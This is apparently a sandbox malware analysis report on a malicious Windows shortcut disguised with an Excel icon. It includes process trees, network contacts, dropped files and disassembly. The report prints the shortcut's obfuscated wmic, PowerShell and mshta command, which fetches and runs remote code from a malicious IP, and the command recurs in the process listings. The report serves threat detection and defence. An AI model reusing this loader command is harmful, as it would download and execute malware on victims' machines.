                            https://aka.ms/pscore68powershell.exe, 00000006.00000002.1444531399.0000022180001000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000006.00000002.1444531399.0000022180001000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://80.76.51.231/Samarik-1-0/mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://oneget.orgpowershell.exe, 00000006.00000002.1444531399.000002218192C000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://80.76.51.231/Samarik1-1-0#mshta.exe, 00000005.00000002.2637014653.0000023A492B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                80.76.51.231
                                		unknownBulgaria
                                		43659CLOUDCOMPUTINGDEtrue

                                Private

                                IP
                                127.0.0.1

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1569818
                                Start date and time:2024-12-06 10:26:03 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 4m 49s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:13
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:6G4au3vWsI.lnk
                                renamed because original name is a hash value
                                Original Sample Name:2b4f800413a890176ebfec3ccc57fcbb.lnk
                                Detection:MAL
                                Classification:mal96.evad.winLNK@9/11@0/2
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 55%
                                • Number of executed functions: 8
                                • Number of non-executed functions: 5
                                Cookbook Comments:
                                • Found application associated with file extension: .lnk

                                Warnings

                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded IPs from analysis (whitelisted): 23.218.208.109
                                • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: 6G4au3vWsI.lnk

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                04:27:00API Interceptor1x Sleep call for process: WMIC.exe modified
                                04:27:02API Interceptor49x Sleep call for process: powershell.exe modified
                                04:28:32API Interceptor2x Sleep call for process: svchost.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                80.76.51.231EqQiuXOCoG.exeGet hashmaliciousAsyncRATBrowse

                                  Domains

                                  No context

                                  ASNs

                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  CLOUDCOMPUTINGDEtegga.htaGet hashmaliciousXmrigBrowse
                                  • 185.216.68.189
                                  KzHndnydSG.dllGet hashmaliciousCobaltStrikeBrowse
                                  • 185.216.71.202
                                  bot.sh4.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45
                                  bot.arm.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45
                                  bot.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                  • 80.76.51.45
                                  bot.x86_64.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45
                                  bot.arm5.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45
                                  bot.m68k.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45
                                  bot.mpsl.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45
                                  bot.mips.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                  • 80.76.51.45

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                  Download File
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):1310720
                                  Entropy (8bit):0.4932214950514226
                                  Encrypted:false
                                  SSDEEP:1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaV:cJhXC9lHmutpJyiRDeJ/aUKrDgnmT
                                  MD5:E696B1872C49D723A1F797AAD8AEB750
                                  SHA1:1127F5EEBA792936ED9D25E94BC4A53B3F89F6B2
                                  SHA-256:00B48193914454E28058B262B02B37019D0CD2D487EB715754720B4B641A2FAA
                                  SHA-512:DE068D19EBBEAAD96404898A20C4126F65FAC644CFE8A078DF5E640D58E8718C33E5FF82D9FC2849EE7298DF7E5F692BA95926E073F9BEF89C29FC41C918A587
                                  Malicious:false
                                  Reputation:low
                                  Preview:^.;V........@..@-....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................................&.#.\.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                  Download File
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb43266a4, page size 16384, DirtyShutdown, Windows version 10.0
                                  Category:dropped
                                  Size (bytes):1310720
                                  Entropy (8bit):0.721715237233982
                                  Encrypted:false
                                  SSDEEP:1536:rSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:razaNvFv8V2UW/DLzN/w4wZi
                                  MD5:7117E20309C73E29B7A0E7C8150E3166
                                  SHA1:4107539EDF73ED17D8182E79265F840A5A20D7B1
                                  SHA-256:F044B8DB0B3A6BC59BBFF15B62AAC0AB99138C981115CA3171F9B348F79044FC
                                  SHA-512:125F00F7F1ECE1604DC2069F35C6F00207FCBCE21A353B6B1F688F15DCC6E54E7837626CFABC8CC595BBB0ED531FD900D8FE362A0DAEFE0488FC5D72233E5FD6
                                  Malicious:false
                                  Reputation:low
                                  Preview:.2f.... ...............X\...;...{......................p.D..........{}. ....|..h.F.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......-....{...............................................................................................................................................................................................2...{..................................*..% ....|..................;x.g ....|...........................#......h.F.....................................................................................................................................................................................................................................................................................................................................................

                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                  Download File
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):16384
                                  Entropy (8bit):0.08098713937702061
                                  Encrypted:false
                                  SSDEEP:3:V/8Yeyw3CoT/fgsCrZClW/tjCwV8Bl/oll+SHY/Xl+/rQLve:VUzjCoLfgs3GpCu8TAAS4M
                                  MD5:EAFA2104F27F467E0E6FBC0CD572FCE4
                                  SHA1:D0D2402D623D2D2B49B139DB84F4736A8FD0BC76
                                  SHA-256:C5676BB494B82BF0CC2387DE9E2AAE0D5392E09B822CF178D8E1AE7D414C5365
                                  SHA-512:A8EEF04140E977A5F3783C7193896A2789DA4B026A540580EDA7F2B8BD627D0A8BEEE78B08C8F0AC28458E84C948608B3EC4E8D027EAF9E57ACB62E36CB7D2D5
                                  Malicious:false
                                  Reputation:low
                                  Preview:...-.....................................;...{.. ....|.......{}..............{}......{}.vv_Q.....{}.................;x.g ....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):2832
                                  Entropy (8bit):5.418003316338724
                                  Encrypted:false
                                  SSDEEP:48:0AzsSU4y4RQmFoUL5o+m9qr9t5/78NVGGxJZKaVEouYAgwd64rHLjtvz:0AzlHyIFKES9qrh7KNJ5Eo9Adrxz
                                  MD5:7DEBE7F44414A6DD2EC9C2C55C926657
                                  SHA1:41E859A82AD20F4AE658F312E141723CE480536C
                                  SHA-256:9F790A21D956FE2BF9DB633A383B59E6F3B582EAD49410312CFAED7DDD880E31
                                  SHA-512:0982A73211AF67C8B5EC178F9540FDABB35405F6D903DAE2C8B12CDB6E3D37723B630C5B985F8C3712DE2EC6B260B61D67DA066FA23EDBE4A3ED0DDC1B56E5BC
                                  Malicious:false
                                  Preview:@...e...........................................................H..............@-....f.J.|.7h8..-.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.<...............i..VdqF...|...........System.Configuration4.................0..~.J.R...L........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............

                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):64
                                  Entropy (8bit):1.1940658735648508
                                  Encrypted:false
                                  SSDEEP:3:Nlllultnxj:NllU
                                  MD5:F93358E626551B46E6ED5A0A9D29BD51
                                  SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                  SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                  SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                  Malicious:false
                                  Preview:@...e................................................@..........

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2tr5azdj.edj.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_osbov1la.0ms.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ovfc34yj.5lm.psm1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xe1fxj22.4br.ps1

                                  Download File
                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:ASCII text, with no line terminators
                                  Category:dropped
                                  Size (bytes):60
                                  Entropy (8bit):4.038920595031593
                                  Encrypted:false
                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                  Malicious:false
                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                  Download File
                                  Process:C:\Windows\System32\svchost.exe
                                  File Type:JSON data
                                  Category:dropped
                                  Size (bytes):55
                                  Entropy (8bit):4.306461250274409
                                  Encrypted:false
                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                  Malicious:false
                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                  \Device\ConDrv

                                  Download File
                                  Process:C:\Windows\System32\wbem\WMIC.exe
                                  File Type:ASCII text, with CRLF, CR line terminators
                                  Category:dropped
                                  Size (bytes):160
                                  Entropy (8bit):5.095703110114614
                                  Encrypted:false
                                  SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MglR2oO6JQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egyodeAc
                                  MD5:F7BD1022C29D3557B7F473259B64C68F
                                  SHA1:E31F3A3944CE634A2206D36D7697A8D8ACF07EDD
                                  SHA-256:DA218F2D2F1B39D996D876B6093A902E9CB8F4F92DDD4D4CC1F64D55DA2DFDC6
                                  SHA-512:8FC5A197831D75D59249AA0245FBE7EC37FC379A0BB5235FFB8B3E316FCA5CA9FAED806531FCA37336FBDEB782ABF684960E1DAFD5F8D1594273B1EC9CF5F2EF
                                  Malicious:false
                                  Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 7488;...ReturnValue = 0;..};....

                                  Static File Info

                                  General

                                  File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=1, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                  Entropy (8bit):2.6818046608099295
                                  TrID:
                                  • Windows Shortcut (20020/1) 100.00%
                                  File name:6G4au3vWsI.lnk
                                  File size:1'886 bytes
                                  MD5:2b4f800413a890176ebfec3ccc57fcbb
                                  SHA1:2411ba93cc9bfbc4498faf4b156d0fbfaefd03ca
                                  SHA256:9c9e8ac1e4fa6cd293e72c02e35417042e55ee3ee70a4460b0fce1d320e183c5
                                  SHA512:c0ccf597e77340cde20d83e3dae5e74c837e54e65ec51e9d93d216d9ce5c8d483003e4494978aa7229a5f9cfbe891ebaee1620c23c7183a092fcb02de157aab7
                                  SSDEEP:24:8X/BUlgKN4eA+/3dkW9Lfzj6dCZTCJCZkrab/FYPs:8PuGeHd5fzj6dCZTCJCZ6abKP
                                  TLSH:3A415614A6F51B10F6F2893348B9A712DA373805D9228F2D019245892427D61FC66F2F
                                  File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                  File Icon

                                  Icon Hash:74f4e6c4c4c9c1cd

                                  Static Windows Shortcut Info

                                  General

                                  Relative Path:..\..\..\Windows\System32\Wbem\wmic.exe
                                  Command Line Argument:process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
                                  Icon location:C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2024-12-06T10:27:48.742769+01002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.94970780.76.51.231443TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Dec 6, 2024 10:27:04.696624994 CET49707443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:04.696683884 CET4434970780.76.51.231192.168.2.9
                                  Dec 6, 2024 10:27:04.696778059 CET49707443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:04.722671986 CET49707443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:04.722696066 CET4434970780.76.51.231192.168.2.9
                                  Dec 6, 2024 10:27:48.742623091 CET4434970780.76.51.231192.168.2.9
                                  Dec 6, 2024 10:27:48.742769003 CET49707443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:48.743000984 CET49707443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:48.743014097 CET4434970780.76.51.231192.168.2.9
                                  Dec 6, 2024 10:27:48.752580881 CET49710443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:48.752626896 CET4434971080.76.51.231192.168.2.9
                                  Dec 6, 2024 10:27:48.752696037 CET49710443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:48.753051043 CET49710443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:27:48.753066063 CET4434971080.76.51.231192.168.2.9
                                  Dec 6, 2024 10:28:32.790530920 CET4434971080.76.51.231192.168.2.9
                                  Dec 6, 2024 10:28:32.790695906 CET49710443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:28:32.791055918 CET49710443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:28:32.791088104 CET4434971080.76.51.231192.168.2.9
                                  Dec 6, 2024 10:28:32.792018890 CET49712443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:28:32.792066097 CET4434971280.76.51.231192.168.2.9
                                  Dec 6, 2024 10:28:32.792140961 CET49712443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:28:32.793075085 CET49712443192.168.2.980.76.51.231
                                  Dec 6, 2024 10:28:32.793107986 CET4434971280.76.51.231192.168.2.9
                                  Dec 6, 2024 10:28:32.793152094 CET49712443192.168.2.980.76.51.231

                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:1
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\Wbem\wmic.exe" process call create "powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -"
                                  Imagebase:0x7ff655480000
                                  File size:576'000 bytes
                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:powershell iex '\*i*\S*3*\m*ta.e* https://80.76.51.231/Samarik' | powershell -
                                  Imagebase:0x7ff760310000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:04:27:00
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff70f010000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:5
                                  Start time:04:27:03
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\mshta.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\mshta.exe" https://80.76.51.231/Samarik
                                  Imagebase:0x7ff7fc930000
                                  File size:14'848 bytes
                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:6
                                  Start time:04:27:03
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
                                  Imagebase:0x7ff760310000
                                  File size:452'608 bytes
                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:04:28:32
                                  Start date:06/12/2024
                                  Path:C:\Windows\System32\svchost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                  Imagebase:0x7ff77afe0000
                                  File size:55'320 bytes
                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:6.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0%
                                    Total number of Nodes:6
                                    Total number of Limit Nodes:0
                                    execution_graph 13985 7ff887a1c809 13986 7ff887a1c80f CreateFileW 13985->13986 13988 7ff887a1c8de 13986->13988 13989 7ff887a145ea 13990 7ff887a5f260 GetFileType 13989->13990 13992 7ff887a5f2e4 13990->13992

                                    Executed Functions

                                    Function 00007FF887A15F80 Relevance: 6.3, Strings: 4, Instructions: 1295COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 158 7ff887a15f80-7ff887a1b5c0 163 7ff887a1b5cc-7ff887a1b603 158->163 164 7ff887a1b5c2-7ff887a1b5c7 call 7ff887a15fe0 158->164 167 7ff887a1b609-7ff887a1b614 163->167 168 7ff887a1b7f4-7ff887a1b809 163->168 164->163 169 7ff887a1b682-7ff887a1b687 167->169 170 7ff887a1b616-7ff887a1b61e 167->170 180 7ff887a1b80b-7ff887a1b812 168->180 181 7ff887a1b813-7ff887a1b819 168->181 172 7ff887a1b689-7ff887a1b695 169->172 173 7ff887a1b6f3-7ff887a1b6fd 169->173 170->168 171 7ff887a1b624-7ff887a1b639 170->171 177 7ff887a1b63b-7ff887a1b660 171->177 178 7ff887a1b662-7ff887a1b66d 171->178 172->168 179 7ff887a1b69b-7ff887a1b6ae 172->179 175 7ff887a1b71f-7ff887a1b727 173->175 176 7ff887a1b6ff-7ff887a1b71d call 7ff887a16000 173->176 186 7ff887a1b72a-7ff887a1b735 175->186 176->175 177->178 189 7ff887a1b6b0-7ff887a1b6b3 177->189 178->168 185 7ff887a1b673-7ff887a1b680 178->185 179->186 180->181 182 7ff887a1b7da-7ff887a1b7df call 7ff887a16000 181->182 183 7ff887a1b81a-7ff887a1b85e 181->183 202 7ff887a1b7e2-7ff887a1b7f3 182->202 207 7ff887a1b87b-7ff887a1b88c 183->207 208 7ff887a1b860-7ff887a1b866 183->208 185->169 185->170 186->168 191 7ff887a1b73b-7ff887a1b756 186->191 195 7ff887a1b6bf-7ff887a1b6c7 189->195 196 7ff887a1b6b5 189->196 191->168 194 7ff887a1b75c-7ff887a1b76f 191->194 194->168 199 7ff887a1b775-7ff887a1b786 194->199 195->168 200 7ff887a1b6cd-7ff887a1b6f2 195->200 196->195 199->168 206 7ff887a1b788-7ff887a1b797 199->206 206->202 209 7ff887a1b799-7ff887a1b7a4 206->209 212 7ff887a1b89d-7ff887a1b8c0 207->212 213 7ff887a1b88e-7ff887a1b899 207->213 210 7ff887a1b868-7ff887a1b879 208->210 211 7ff887a1b8c1-7ff887a1b93a 208->211 209->202 216 7ff887a1b7a6-7ff887a1b7d8 209->216 210->207 210->208 226 7ff887a1b93c-7ff887a1b94c 211->226 227 7ff887a1b94e-7ff887a1b95f 211->227 213->212 216->182 226->226 226->227 229 7ff887a1b961-7ff887a1b96c 227->229 230 7ff887a1b970-7ff887a1b9a1 227->230 229->230 234 7ff887a1b9a3-7ff887a1b9a9 230->234 235 7ff887a1b9f7-7ff887a1b9fe 230->235 234->235 238 7ff887a1b9ab-7ff887a1b9ac 234->238 236 7ff887a1ba3f-7ff887a1ba68 235->236 237 7ff887a1ba00-7ff887a1ba01 235->237 239 7ff887a1ba04-7ff887a1ba07 237->239 240 7ff887a1b9af-7ff887a1b9b2 238->240 241 7ff887a1ba69-7ff887a1bb32 239->241 243 7ff887a1ba09-7ff887a1ba1a 239->243 240->241 242 7ff887a1b9b8-7ff887a1b9c8 240->242 259 7ff887a1bb3b-7ff887a1bb3f 241->259 260 7ff887a1bb34-7ff887a1bb39 241->260 245 7ff887a1b9ca-7ff887a1b9ec 242->245 246 7ff887a1b9f0-7ff887a1b9f5 242->246 247 7ff887a1ba1c-7ff887a1ba22 243->247 248 7ff887a1ba36-7ff887a1ba3d 243->248 245->246 246->235 246->240 247->241 251 7ff887a1ba24-7ff887a1ba32 247->251 248->236 248->239 251->248 261 7ff887a1bb42-7ff887a1bba1 259->261 260->261 266 7ff887a1bbd9-7ff887a1bc2c 261->266 267 7ff887a1bba3-7ff887a1bbd4 call 7ff887a14620 261->267 275 7ff887a1bc2e-7ff887a1bc33 266->275 276 7ff887a1bc35-7ff887a1bc39 266->276 267->266 277 7ff887a1bc3c-7ff887a1bc87 275->277 276->277 281 7ff887a1bc89-7ff887a1bc8e 277->281 282 7ff887a1bc90-7ff887a1bc94 277->282 283 7ff887a1bc97-7ff887a1bdb6 281->283 282->283 297 7ff887a1bdb8-7ff887a1bdba 283->297 298 7ff887a1bdbc-7ff887a1bdd5 283->298 299 7ff887a1bdd7-7ff887a1bde5 297->299 298->299 301 